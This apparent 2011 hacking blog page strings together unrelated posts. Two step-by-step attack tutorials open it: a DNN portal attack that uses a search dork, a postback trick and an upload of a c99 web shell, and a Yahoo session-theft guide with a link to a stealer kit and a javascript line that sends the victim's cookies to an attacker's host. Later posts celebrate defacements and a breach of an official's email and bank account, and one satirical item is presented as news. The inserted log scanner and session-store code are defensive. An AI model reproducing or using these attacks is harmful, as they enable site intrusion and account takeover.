Wednesday, 6 April 2011

Portal Hacking (DNN) - Website Hacking Technique Explained !

Hello friends. One more hacking method is called "Portal Hacking (DNN)". This method also uses Google search to find hackable sites. Now you can imagine how important google.com is for hackers too.

Let's start the tutorial...
 


Step 2: Now enter this dork:
inurl:/tabid/36/language/en-US/Default.aspx

This is a dork to find sites with the vulnerable portal; use it wisely.

Step 3:
You will find many sites. Select the site which you are comfortable with.

Step 4: 
For example take this site.
Example:     http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx

Step 5: Now replace
/Home/tabid/36/Language/en-US/Default.aspx
  
with this

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 
 

Step 6: You will get a Link Gallery page. So far so good!

Step 7: Don't do anything for now, wait for the next step...

Step 8: Now replace the URL in the address bar with a simple script:

                        javascript:__doPostBack('ctlURL$cmdUpload','')

Step 9: You will find the Upload option.

Step 10:
Select Root

Step 11:
Upload your package, i.e. your shell (c99, c100, etc.).
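
For site owners, the request sequence in steps 5 to 8 leaves a recognisable trace in the web server log, because the postback in step 8 is an HTTP POST to the same page. The following added example (not part of the original post) scans IIS W3C-format log text for requests to the link gallery page and ranks them; the log lines, IP addresses and severity labels are constructed for illustration.

```python
# Added example: flag requests to the DNN FCK link gallery page in IIS W3C logs.
# The log lines below are constructed sample data, not real traffic.
GALLERY_PATH = "/providers/htmleditorproviders/fck/fcklinkgallery.aspx"

SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2011-04-06 10:01:12 198.51.100.7 GET /Home/tabid/36/Language/en-US/Default.aspx - 200
2011-04-06 10:01:40 198.51.100.7 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 200
2011-04-06 10:02:05 198.51.100.7 POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 200
2011-04-06 10:05:31 203.0.113.20 GET /providers/htmleditorproviders/fck/FckLinkGallery.aspx - 404
2011-04-06 10:06:00 192.0.2.44 GET /Default.aspx - 200
"""

def find_gallery_hits(log_text):
    """Return one dict per request to the link gallery page.

    severity is 'high' for a POST answered with 2xx (the server accepted a
    postback on the gallery page), 'medium' for any other answered request,
    and 'low' when the server returned 404 (page not present).
    """
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names follow the directive
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        # IIS paths are case-insensitive, so compare in lower case.
        if not row.get("cs-uri-stem", "").lower().endswith(GALLERY_PATH):
            continue
        status = int(row.get("sc-status", "0"))
        if status == 404:
            severity = "low"
        elif row.get("cs-method") == "POST" and 200 <= status < 300:
            severity = "high"
        else:
            severity = "medium"
        hits.append({"ip": row.get("c-ip"), "method": row.get("cs-method"),
                     "status": status, "severity": severity})
    return hits

if __name__ == "__main__":
    for hit in find_gallery_hits(SAMPLE_LOG):
        print(hit)
```

A 'high' hit is worth following up by checking the portal root for files created around the same timestamp.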

Hope you all like my articles... Please comment!

Hack Yahoo Accounts with Session IDs or Session Cookies !

Hello friends, this is a guest post by Mr. Aneesh M. Makker, admin of http://www.explorehacking.com/, on "Hack Yahoo accounts with Session IDs or session cookies".



What are session IDs or session cookies?
In simple terms, whenever we sign in to an account, the site generates a unique string. One copy is saved on the server and the other in our browser as a cookie. Both are matched every time we do anything in our account. This string, or login session, is destroyed when we click on the 'Sign Out' option.

Just log in to yahoo.com. Type in the browser: javascript:alert(document.cookie);
You will get a pop-up box showing you the cookies. Now log in to your account and do the same thing; you will see more elements added to the cookies. These represent session IDs.

Note: By stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in the form of cookies.

An attacker can steal that session by convincing the victim to run a piece of code in the browser. The attacker can use the stolen session to log in to the victim's account without providing any username/password. This attack is very uncommon because when the victim clicks 'Sign out', the session gets destroyed and the attacker also gets signed out.

But in the case of Yahoo, it's not the same. The attacker doesn't get signed out when the victim clicks 'Sign out'. The session does get destroyed automatically by Yahoo after 24 hrs, but when the user simply refreshes the window in the Yahoo account, he gets a session for the next 24 hrs. This means that once a Yahoo account session is stolen, the attacker can access the account for a lifetime by refreshing the window every 24 hrs. I am not actually sure whether it's 24 or 48 hrs.
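
Seen from the server side, the behaviour described above means that sign-out does not delete the server's copy of the session and that renewal has no upper limit. The following added example (not from the original post, and not Yahoo's code) shows a session store that closes both gaps; the class name, the `sid` cookie name and the 7-day cap are assumptions.

```python
import secrets

IDLE_TTL = 24 * 3600          # sliding window; mirrors the article's 24-hour figure
ABSOLUTE_TTL = 7 * 24 * 3600  # hard cap on total session age (assumed value)

class SessionStore:
    """Server-side session table keyed by an unguessable token (hypothetical class)."""

    def __init__(self):
        self._sessions = {}  # token -> {"user", "created", "last_seen"}

    def login(self, user, now):
        token = secrets.token_urlsafe(32)
        self._sessions[token] = {"user": user, "created": now, "last_seen": now}
        return token

    def validate(self, token, now):
        """Return the user for a live token, else None. Renews the idle timer."""
        rec = self._sessions.get(token)
        if rec is None:
            return None
        idle_expired = now - rec["last_seen"] > IDLE_TTL
        too_old = now - rec["created"] > ABSOLUTE_TTL
        if idle_expired or too_old:
            del self._sessions[token]   # refreshing cannot extend past the cap
            return None
        rec["last_seen"] = now
        return rec["user"]

    def logout(self, token):
        """Sign out deletes the server record, so any copy of the cookie dies too."""
        return self._sessions.pop(token, None) is not None

def session_cookie_header(token):
    # HttpOnly keeps the value out of document.cookie; Secure limits it to HTTPS.
    return f"Set-Cookie: sid={token}; Path=/; Secure; HttpOnly; SameSite=Lax"

if __name__ == "__main__":
    store = SessionStore()
    sid = store.login("alice", now=0)
    copied = sid                          # the same string in a second browser
    store.logout(sid)
    print(store.validate(copied, now=60))  # None: the copy no longer works
```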

Requirement: Download some files from here
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar

Tutorial to steal session IDs :-
1. Sign up for an account at any free webhosting site. I have chosen my3gb.com.

2. Log in to your account and go to the file manager. Upload the four files that you have just downloaded.
    Make a new directory 'cookies' here.

3. Give this code to the victim to run in his browser while he is logged in to his Yahoo account. Yahoo.php is basically the cookie-stealing script and hacked.php executes the stolen cookies in the browser.
Stolen cookies get stored in the directory 'cookies'.
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));
He would again be redirected to his Yahoo account.

4. Open hacked.php. The password is 'explore'.

You should now have the username of the victim's account. Simply click on it and it will take you to the inbox of the victim's Yahoo account without asking for any password.

Now it doesn't matter if the victim signs out of his account; you will remain logged in to it.

Note: You can try this attack by using two browsers. Sign in to a Yahoo account in one browser and run the code. Then sign in through the other browser using the stolen session.

Thank you for reading this Article.
Rohit

Bihar Cricket Council website hacked by ZCompany Hacking Crew !




Statement given by Hacker "- Recently an Indian hacker called Angel aka 4d0r4bl3 defaced a Pakistani government site sending a warning message to ZHC & TeaMp0isoN, our reply:
- We deface for a reason, our reason for defacing is to raise awareness of issues in the world, our main focus is Palestine & Kashmir - we have no time for silly little "cyber-wars" go ask some PCA kids to play with you -".

Hacked site Link : http://biharcricket.com/
Mirror Link http://zone-h.com/mirror/id/13033297

Email & Bank Account of DIRECTOR,Indian Ministry of Communications & IT Hacked by Zcompany Hacking Crew !


Last night (24 March 2011) we (The Hacker News) got an email from the ID of Amar Singh Meena, DIRECTOR (T)TEC, Ministry of Communications & IT. But this email was sent by a hacker with the codename "Hard Hunter" from Zcompany Hacking Crew, using his email ID. Zcompany Hacking Crew, or ZHC, hacks to raise awareness of the issues in the world, with a main focus on Kashmir & Palestine. Now they have access to the personal email ID of Mr. Amar Singh Meena and also have his ICICI Bank details.


Even Today 1389 Indian websites defaced/Hacked By ZCompany Hacking Crew & TeaMp0isoN : Read Here


How ZHC hacked into the email :
Hard Hunter [ZHC] had access to an online store where he found the email of Amar Singh; they logged into his email and then went for his ICICI details.


Message From ZHC :
As in the above image, in the email sent to us (The Hacker News) from the hacked email account, they said:


Hello Hackers News,
This is not A.S meena himself but its me Hard Hunter from Zcompany
Hacking Crew. We want to show this that we've successfully hacked into
the Director's email and got his bank account details and etc. We're
going to show those documents soon

Regards
Hard Hunter[ZHC]



They have said that they will make all his bank and email data public soon!


Proof Of Hack :
Here are some screenshots sent to us by ZHC as proof of the hack:
1.) Reliance share hold Email
2.) Email Related to National Securities Depository Limited
3.) ICICI Bank Account Details / Account Successfully Accessed


India's CBI plans to send teams to US, Europe to trace hackers !


Against the backdrop of the attack on its website by "Pakistan Cyber Army", the CBI is considering sending its team to the US and Europe to trace hackers involved in the defacement.

Sources said the agency officials have pin-pointed three Internet Protocol (IP) addresses -- a unique numerical label borne by each computer in a network that uses the World Wide Web for communications -- two originating from Seattle, Pennsylvania in the US and the other in Daugavpils, Latvia in northern Europe.

They said the agency has moved a local court here seeking permission to access authorities in the US and Latvia for collecting information on the IP addresses.

The CBI had on December 4 last year registered a case against unknown persons of "Pakistani Cyber Army" for hacking and defacement of its website under various Sections of Information Technology Act.

India needs Hackers in 2011 !



When other 12-year-olds spend the day playing or watching films, Shantanu Gowde has been in the news for spending time with IT professionals twice his age. India's youngest hacker, Shantanu was just three years old when he used the computer to make PowerPoint presentations, slideshows and birthday cards for friends. Now, he has 'ethically' hacked into websites of over 50 corporate houses and individuals and gives regular security tips to a Mumbai IT firm.

Worried over increasing piracy and leaks of movie trailers and posters, film-makers and production companies have turned to experts who can take down the offending websites. Girish Kumar, managing director of Aiplex Software has provided online anti-piracy solutions to over 50 Bollywood films including My Name is Khan, Housefull and Peepli Live and big banners like UTV, Eros and Yashraj Films. He says, "Most production houses are aware of the fact that online piracy is a real threat. Often, copyright notices do the trick. With sites that offer 'torrents' of movie downloads, we flood it with fake links or direct the website address away from the actual page."

In 2010, hackers made news several times: for instance, Future Group's flagship ecommerce portal stopped functioning for two days after an attack, and investigation agency CBI's portal was hacked by programmers who identified themselves as "Cyber Pakistani army". Rajya Sabha member and industrialist Vijay Mallya's personal website too was allegedly broken into by Pakistani hackers. The US Army website also stopped functioning for a day after being hacked. Social messaging service Twitter also shut down for hours, while Facebook experienced intermittent access problems after such attacks.

Explains security evangelist Rohit Srivastava, "A hacker's job is to help the company find and plug loopholes in the system. Companies hire us to build a team of in-house security which develops software and systems that are hacking-proof." Rohit is the founder of Hack-Club, a first for hackers in India, to increase security awareness among the general public.

As the unconventional skill gains credibility, more and more people are opting for it as a career. Says Sheetal Kapoor, who has done a post-graduate diploma course in ethical hacking and cyber security, "I have worked as a cyber security consultant with MNCs and on certain government projects. Companies are increasingly concerned about the security of their websites."

Over the years, hackers have perfected innovative ways to crack into protections built into a computer operating system. Well-known hacker Ankit Fadia began by experimenting with his home computer at the age of 12 and in two years, wrote his first book on the subject. Ankit claims he was consulted by an intelligence agency for breaking an encrypted message that was believed to have been sent by one of Osama Bin Laden's men. Today, he is a security consultant for several MNCs and even hosts a show on a popular youth channel. He says, "I was attracted to the power of being able to do something most people could not, that's how my love for hacking began. Now, I have been able to convert my hobby into a profession as well."

Ankit adds, "As the reach of the Internet spreads, the challenges that organizations, whether government, semi-government or private, face are enormous. New vulnerabilities are discovered daily and can expose the information network to unwanted elements."

A much abused word, "hacker" originally meant "clever programmer". Hackers stunned the world when WikiLeaks supporters unitedly brought down the Swedish government's website along with those of PayPal and MasterCard. In fact, the World Wide Web was discovered by hacker Timothy J. Berners-Lee, who was caught hacking and banned from using his university's computer. Hacker Steven Gary Wozniak invented the Apple I, one of the first microcomputers. He and Steve Jobs assembled the first prototypes in Jobs's garage. The software was coded mostly by Wozniak.

Among the country's best ethical hackers, Sunny Vaghela had his e-mail account hacked when he was 16. The curiosity to catch the hacker motivated him to become a professional himself. "I hacked into major government and private websites and later sent them a note, suggesting possible solutions," he says.

Sunny, whose technical advice was accepted and adopted by Google's social networking website Orkut, when he pointed out loopholes to its administrators, explains, "A professional hacker can earn more than a regular IT professional. In the last six months, nearly 4.5 lakh sites were hacked, and last year, around 2.5 lakhs were hacked. Antivirus and firewalls are not enough to protect your data." Dinesh Pillai, CEO Mahindra SSG and his team of "ethical hackers" believe that every company needs trained hands to implement security risk management systems. "The demand for this skill is going to go up as companies realize the need to protect business and brand value."

Hackers Changes Millions of Passwords to "password" !


Passwords from over 3,000,000 user accounts were apparently set to "password" late last night in a wide-spread hack that affected hundreds of news, retail and Web 2.0 sites. Most affected users are completely unaware of the attack.



According to current statistics, 62% of affected users would not notice such a change as their password was already "password".


Several sites have reported that they are taking steps to protect compromised accounts. In addition, many sites are creating a new rule to ban using the word "password" as a password.


Users are reacting fiercely to the hack but even more so to the ban many sites are putting on one of the world's most popular passwords. Online riots are to be expected.


The hacker group named "Obvious" has claimed credit for last evening's attack. Thousands of hacked Twitter and Facebook accounts posted the message "We are all Obvious! Don't Expect Us".


A 1.9 GB file containing more than 3,000,000 user names — and one password — is now available for download as a torrent file via The Pirate Bay.


To avoid problems like this in the future, we are recommending users to change their password everywhere to "password1", which is obviously more secure.

MumbaiITPro User Group Hacked by TriCk [TeaMp0isoN]



MumbaiITPro User Group is an online technical community initiative for the IT Professionals. They are supported by Global IT Community Association (GITCA) and Microsoft Corporation.


Hacked site : http://mumbaiitpro.org/
Mirror : http://mirror.sec-t.net/defacements/?id=7039